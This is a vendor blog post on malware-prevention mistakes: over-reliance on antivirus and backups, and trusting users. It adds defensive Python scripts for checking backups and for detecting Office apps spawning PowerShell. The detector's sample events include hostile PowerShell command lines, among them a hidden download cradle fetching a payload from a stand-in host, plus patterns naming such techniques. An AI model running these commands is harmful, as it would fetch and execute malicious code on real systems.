Jonathan Crowe
Mar 2018

Malware Prevention: 3 Big, Risky Gambles SMBs Inadvertently Make


When it comes to these three common security choices, many companies may not realize how heavily they're relying on the luck of the draw.

Counting on luck is something you do at the craps table or when you play the lottery. It obviously isn't a position you want to be in with your company's security on the line. 

Unfortunately, it's incredibly common for even large, well-funded organizations to take massive gambles by leaving elements of their security up to chance. In some cases, it’s simply a matter of not having enough time or resources to cover all the bases. In other cases — and this is more worrisome — it's a result of a fatalistic attitude toward security, a belief that because "compromise is inevitable" there's really only so much you can do. In the very worst cases, however, organizations may believe they're fully protected, only to realize after the fact that gaps in their current solutions and policies are forcing them to take much bigger gambles than they'd initially realized. 

Is your organization actually secure from malware, or just hoping its luck won't run out? 

Here are three of the most common risky mistakes companies make, along with a few cautionary tales and recommendations for safer bets.

Risky Mistake #1: Rolling the Dice with AV



With the rapid proliferation of new and more sophisticated malware and attack techniques, IT pros are increasingly losing faith in traditional antivirus (AV) solutions. According to the Ponemon Institute’s 2017 State of Endpoint Security Risk report, less than a third of organizations believe their AV can stop today’s malware threats. In fact, 4 out of 5 organizations either replaced or augmented their existing AV solutions in 2017.

The problem is many AVs still only block specific malware samples that they've seen before, or that have been reported on sites like VirusTotal. New variants are able to evade detection, as are samples that utilize polymorphic techniques to make small, superficial changes to their code each time they land on a new machine. Malware authors have no problem cranking out new samples and utilizing various techniques to obfuscate them, and as a result, most AVs are stuck in a perpetual state of playing catch-up and being left in the dark until it's too late. 

In a shift away from the signature-matching approach, NGAV and some AV solutions are now utilizing machine learning algorithms in order to help them predict whether a file is malicious or not, regardless of whether or not they've seen it before. To counter this development, attackers are increasingly adopting techniques that allow them to deploy their attacks filelessly, hijacking legitimate system tools and processes or executing malicious code directly in memory, instead.

That's a major problem since, with no file to scan or analyze, the majority of AV and NGAV solutions don't stand much of a chance.  

According to Ponemon, 77 percent of successful compromises in 2017 involved the use of fileless techniques. Attackers know a winner when they see one, and this year one out of every three attacks is expected to utilize fileless techniques. 


Real-life cautionary tales

"The tools we have in place didn't work. It's ahead of our tools."

— Brandi Simmons, spokesperson for the Colorado Office of Information Technology on the CDOT's second ransomware infection in eight days

  • In February, the Colorado Department of Transportation (CDOT) was forced to shut down 2,000 state computers and call in the FBI after a variant of SamSam ransomware infiltrated their network. The CDOT's antivirus provider, McAfee, wasn't able to block the attack. The best it could do was issue an update after the fact to ensure the ransomware would be blocked in the future. Yet, just eight days later, the CDOT was infected a second time with a "new" variant of SamSam that had been slightly altered. 

    "We had 20 percent of the computers up and running when our security tools detected malicious activity. And sure enough the variant of SamSam ransomware just keeps changing," a spokesperson for Colorado's Office of Information Technology said. "The tools we have in place didn't work. It's ahead of our tools."

  • Around the same time as the initial CDOT infection, the city of Allentown, PA experienced an outbreak that left the city's network infected with Emotet, a dangerous credential-stealing trojan that spreads quickly and is notoriously difficult to remove. The malware evaded the city’s AV defenses and infected many of its most critical systems, including a 185-camera surveillance network. The attack also forced the closure of several public safety operations and put a freeze on some of the city’s financial transactions. In total, the cost of removing the malware was estimated at $1 million.

  • Last June, San Francisco's public TV and radio station KQED found itself battling a ransomware infection despite having just updated its AV systems the morning of the attack. The station also had firewalls, email scanning, and multiple malware detection programs in place, but none of them prevented the ransomware from encrypting files and triggering a month-long recovery period. When asked to describe the disruptive impact of the attack one employee said, "It's like we've been bombed back to 20 years ago, technology-wise."  

The safer bet

For years, AV solutions have been a cornerstone in protecting endpoints from malware. But more and more of today's attacks are bypassing antivirus, exploiting well-documented limitations in what AV is able to see and detect. To close the gaps AV leaves them exposed to, companies need to invest in stronger, smarter endpoint protection designed to block malware with a more modern approach.

You can learn more about the specific gaps in AV and NGAV coverage by downloading our AV Gap Analysis whitepaper. In it, you'll also learn how Barkly can help you close those gaps and actually get ahead of the game. 

In addition to replacing or augmenting antivirus, there are several practical things organizations can do to reduce their exposure to attacks and render common malware delivery methods ineffective. We've collected these recommendations in our 2018 Cybersecurity Checklist, which you can download here.   

Risky Mistake #2: You're Tempting Fate with Backup



Every organization should be using backup. No organization should be using it as a substitute for good security. 

Think of it this way — if you go skydiving and your instructor says the primary parachute you're using fails all the time, but not to worry, you've got the backup chute, chances are you're not going to jump out of the airplane. 

Backup can help save the day if you get infected with ransomware, but it's never going to be better than preventing the infection in the first place. For one thing, the ability to recover quickly and successfully from backup should never be taken for granted. According to a survey we conducted with victims of ransomware, 58 percent were unable to recover all of their encrypted data from backup.

Part of the problem is that backups can get infected and corrupted just like any other part of your network. In addition, if organizations don’t regularly practice actually recovering from their backups, they're making a lot of dangerous assumptions about how well things will work when it's no longer a drill.

Even in cases where data is successfully restored, the process of wiping, restoring, and bringing infected systems back online takes time and resources. 

Real-life cautionary tales

"The core components of the backup files...had been purposefully and permanently corrupted by the hackers. Thus...acquisition of the decryption keys was unavoidable."

— Steve Long, President and CEO of Hancock Health on a ransomware attack that infected the hospital in January 2018

  • Some attacks go out of their way to make recovering from backup more difficult or even impossible. Hancock Health, a regional hospital in Indiana, faced one such attack in January, and was forced to pay out $55,000 in ransom to recover encrypted data. While it wasn't involved in that particular attack, the recently-discovered Zenis ransomware is another example of malware that not only encrypts files, but deletes backups. 

  • When employees working for Bingham County, Idaho discovered last February that they had been locked out of crucial emergency dispatch systems by ransomware, county officials initially thought they could simply wipe infected systems, restore them from backups, and avoid paying any ransom. Unfortunately, like many others, they discovered not all their servers could be restored.

    Bingham County wound up paying $3,500 in ransom, but the full cost of recovery and damages was far more substantial. In addition to the labor-intensive process of restoring data, the IT team had to completely rebuild its servers. When all was said and done, the total cost of recovery was estimated at $100,000.

  • That bill pales in comparison to the one Erie County Medical Center found itself footing last April. The hospital suffered massive financial and productivity loss after a ransomware attack took down 6,000 computers and forced hospital staff to resort to low-tech, manual processes, some of which hadn’t been used in twenty years. Despite having backups it was able to successfully restore from, the hospital's recovery process still took more than a month and racked up a total cost of $10 million.

The safer bet

Backup is an extremely important part of disaster preparedness, but it's no replacement for strong security. Each of the attack victims referenced above would likely agree an ounce of prevention is worth a pound of cure. If there's one big takeaway from their stories, it's that equal investment in preventative security solutions and policies is the safer bet. 

In terms of relying on backup, however, there are practical things organizations can do to help reduce inherent risk:

  • Embrace 3-2-1 backup: By having three copies of your data in two different locations, one of which isn't on your network, you can greatly improve your odds of actually having backups available when you need them most.

  • Use both image and file backup: Image backup (which creates a snapshot of your computer that allows you to restore your computer to a state it was in at a previous point in time) is easier to manage and quicker to restore than thousands of individual files. A file-based backup, on the other hand, allows for faster recovery of single files (allowing you to restore critical documents right away).

  • Test, test, test: As a best practice, testing your ability to restore systems from backup and how long it actually takes is a great way to anticipate the resources (financial and human) and time it will take to recover from a ransomware attack.
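The three recommendations above (3-2-1 coverage, keeping restores manageable, and actually testing them) can be turned into routine checks. The script below is an added example written for this post, not Barkly's code or any product feature: it scores a backup inventory against the 3-2-1 rule as the post phrases it (three copies, two locations, one not reachable from the network), builds a SHA-256 manifest of a backup set so silent corruption of the kind Hancock Health described is caught before a restore is needed, and times a restore drill. The `BackupCopy` fields, the directory layout and the sample files are all constructed for the example.

```python
import hashlib
import os
import shutil
import tempfile
import time
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class BackupCopy:
    """One copy of the data. Field names are assumptions made for this example."""
    name: str
    location: str       # site or provider, e.g. "hq", "colo", "cloud-region-a"
    off_network: bool   # True if production hosts cannot reach it (offline media, immutable store)


def check_321(copies: List[BackupCopy]) -> Dict[str, bool]:
    """Evaluate the 3-2-1 rule as stated in the post: 3 copies, 2 locations, 1 off-network."""
    return {
        "three_copies": len(copies) >= 3,
        "two_locations": len({c.location for c in copies}) >= 2,
        "one_off_network": any(c.off_network for c in copies),
    }


def passes_321(copies: List[BackupCopy]) -> bool:
    return all(check_321(copies).values())


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every file under root (relative, '/'-separated) to its SHA-256 digest.
    Store the manifest with the off-network copy, not beside the live data."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(path)
    return manifest


def verify_manifest(root: str, manifest: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (relative path, problem) for files that are missing or whose digest changed."""
    problems = []
    for rel, expected in manifest.items():
        path = os.path.join(root, *rel.split("/"))
        if not os.path.exists(path):
            problems.append((rel, "missing"))
        elif sha256_file(path) != expected:
            problems.append((rel, "checksum mismatch"))
    return sorted(problems)


def timed_restore(backup_root: str, restore_root: str) -> float:
    """Restore drill: copy the set to a scratch location and report elapsed seconds."""
    start = time.perf_counter()
    shutil.copytree(backup_root, restore_root)
    return time.perf_counter() - start


def demo() -> dict:
    """Build a constructed backup set, record its manifest, then simulate corruption
    and loss of two files and show that verification catches both."""
    with tempfile.TemporaryDirectory() as work:
        backup = os.path.join(work, "backup")
        for rel, content in {
            "db/ledger.db": b"constructed ledger contents",
            "docs/policy.txt": b"constructed policy document",
            "docs/readme.txt": b"constructed readme",
        }.items():
            path = os.path.join(backup, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        manifest = build_manifest(backup)
        restore_seconds = timed_restore(backup, os.path.join(work, "restore"))
        # Simulate what a backup-aware attack or bit rot does to the copy.
        with open(os.path.join(backup, "db", "ledger.db"), "ab") as fh:
            fh.write(b"\x00garbage")
        os.remove(os.path.join(backup, "docs", "policy.txt"))
        return {
            "manifest_entries": len(manifest),
            "problems": verify_manifest(backup, manifest),
            "restore_seconds": restore_seconds,
        }


if __name__ == "__main__":
    inventory = [
        BackupCopy("production", "hq", False),
        BackupCopy("nightly-nas", "hq", False),
        BackupCopy("weekly-offsite", "colo", True),
    ]
    print("3-2-1:", check_321(inventory))
    print("drill:", demo())
```

Run the manifest check on a schedule against every copy, and treat a non-empty problem list as an incident: a backup whose checksums have drifted is exactly the one that will fail you after an attack. The timing from `timed_restore` is what feeds the "how long it actually takes" estimate the third recommendation asks for.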

Risky Mistake #3: You're Betting on Good User Behavior


We can (and should) have faith in our colleagues. We can (and should) invest in training to help them be more aware of security risks and be savvier when it comes to avoiding them. But there’s a reason why they say “to err is human.”

Expecting any amount of effort, no matter how great, will completely shut the door on attacks that take advantage of user error isn't just unrealistic, it's also incredibly risky. 

Malicious emails continue to be one of the most common attack vectors for a reason — they still work. Attackers have invested in making them increasingly sophisticated and realistic, in some cases even hijacking user email accounts to send their contacts new emails and replies they wouldn't have any reason not to open and click. 

Real-life cautionary tales

  • In November, a Barkly user received what appeared to be a reply to an existing email chain. The new message pointed to an attached Word document, which made sense in the context of the email chain. The user opened the document and enabled macros, and that's when Barkly's behavior analysis detected a macro attempting to launch PowerShell code designed to download a malicious payload that was later determined to be the Ursnif banking trojan.

    By blocking the PowerShell script from executing, Barkly prevented the payload from being downloaded. By preventing the user from being infected, Barkly also prevented them from being turned into a new delivery vehicle for additional attacks, this time sent from their email account to their email contacts. 

  • In late February, the Financial Services Information Sharing and Analysis Center (FS-ISAC) circulated a notice to its members that a phishing attack on a FS-ISAC employee had compromised that employee's logon credentials. The employee's account was then used to launch additional phishing attacks against other FS-ISAC members. While this particular attack was contained quickly, it’s an excellent example of how anyone can be fooled, even security experts whose job is to share details on the latest threats.
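The Ursnif incident above hinged on one observable behaviour: a Word document spawning PowerShell to fetch a payload. Any organization with process-creation telemetry can look for that parent/child relationship itself. The script below is an added example written for this post; it is not Barkly's behaviour analysis or any product's logic. It parses a constructed `Key=Value|Key=Value` event format (loosely modelled on the fields a process-creation record carries), flags Office applications launching script hosts, and raises the severity when the command line also shows indicators such as an encoded command, a download cradle or a hidden window. The event lines, host names, users and the encoded-command placeholder are all made up for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events. These are not real telemetry.
SAMPLE_EVENTS = [
    r"Time=2017-11-14T09:12:03|Host=ws-finance-07|User=CORP\jdoe"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -nop -w hidden -ep bypass -enc AAAAPLACEHOLDERAAAA",
    r"Time=2017-11-14T09:15:41|Host=ws-it-02|User=CORP\admin"
    r"|ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    r"Time=2017-11-14T09:20:10|Host=ws-finance-07|User=CORP\jdoe"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\splwow64.exe"
    r"|CommandLine=C:\Windows\splwow64.exe 12288",
    r"Time=2017-11-14T10:02:55|Host=ws-sales-11|User=CORP\asmith"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')",
    r"Time=2017-11-14T10:30:00|Host=ws-hr-04|User=CORP\bnguyen"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd.exe /c dir",
]

# Office applications that should rarely, if ever, spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and script hosts commonly abused by macro droppers.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line traits that raise severity; order determines the indicator list order.
SUSPICIOUS_ARGS = [
    (re.compile(r"-e(nc(odedcommand)?)?\s", re.IGNORECASE), "encoded command"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.IGNORECASE), "download cradle"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE), "hidden window"),
    (re.compile(r"-nop\b|-noprofile", re.IGNORECASE), "no profile"),
    (re.compile(r"bypass", re.IGNORECASE), "execution policy bypass"),
]

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\|\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Split a Key=Value|Key=Value line; values may contain spaces and backslashes."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: Dict[str, str]) -> Optional[dict]:
    """Return a finding when an Office parent launches a script host, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    indicators = [label for pattern, label in SUSPICIOUS_ARGS if pattern.search(cmd)]
    return {
        "time": event.get("Time", ""),
        "host": event.get("Host", ""),
        "user": event.get("User", ""),
        "parent": parent,
        "child": child,
        "indicators": indicators,
        # Office -> script host alone is worth a look; with obfuscation or download traits it is not.
        "severity": "critical" if indicators else "high",
    }


def scan(lines: List[str]) -> List[dict]:
    findings = (analyze_event(parse_event(line)) for line in lines)
    return [finding for finding in findings if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['host']} {finding['user']}: "
              f"{finding['parent']} -> {finding['child']} {finding['indicators']}")
```

The "high" finding for Excel launching `cmd.exe` with a harmless command line is deliberate: in most environments the parent/child pair alone is rare enough to review, and tuning it per application (a known add-in, a sanctioned macro) is cheaper than missing the next variant that changes its command line but not its behaviour.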


The safer bet

Once we accept that users will be users and mistakes will inevitably happen, the next thing organizations should do is accept that it isn't appropriate to put all the pressure on them to avoid and prevent attacks. The better move is to provide users with safety nets that proactively prevent and limit the possible damage caused by attacks that target them. 

After all, begging users to stop opening email attachments only goes so far. There are other things organizations can do that they have full control of, including:

Don’t just hope your luck will hold out. Get smart and take charge.

It may be tempting to rely on past good fortune to keep you out of harm’s way, but it only takes one attack to make you wish you'd done more sooner. The good news is taking the steps covered here can help you avoid a harsh reality check when luck finally does run out. 

Find out how Barkly can protect your organization with stronger, smarter protection (not luck). See how it works. 

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.
